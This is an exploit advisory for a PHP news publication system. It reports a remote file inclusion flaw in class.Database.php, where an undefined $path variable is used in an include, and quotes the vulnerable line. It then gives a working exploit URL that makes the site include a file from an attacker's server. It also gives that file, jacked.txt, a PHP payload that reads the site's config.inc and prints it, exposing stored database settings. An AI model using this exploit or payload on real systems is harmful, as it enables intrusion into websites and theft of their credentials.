Software: News publication system -------------------------------- Description: News publication system provides a mechanism for news blocks publication on site in conformity with rules and templates set. Provides a mechanism for adding news to the system and news management. Provides a mechanism for system management functions access control. ------------------------------------ Site: http://sourceforge.net/project/showfiles.php?group_id=27445 ----------------------------------------------------------- The variable $path in class.Database.php isn't defined before it is included. Register_Globals must be on. Vulnerable Code: if ($path!="") include $path."config.inc"; else include "../config.inc"; ----------------------------- Exploit http://[SITE]/newsp/lib/class.Database.php?path=http://[your server]/jacked.txt? ------------------------------ Jacked.txt <?php $file='../config.inc'; $handle=fopen($file,'r'); while(!feof($handle)) { if($handle) { $data = fgets($handle,filesize($file)); $data.='<br>'; } else { echo 'handle failed'; } echo $data; } exit(0); ?> Navairum legalize it
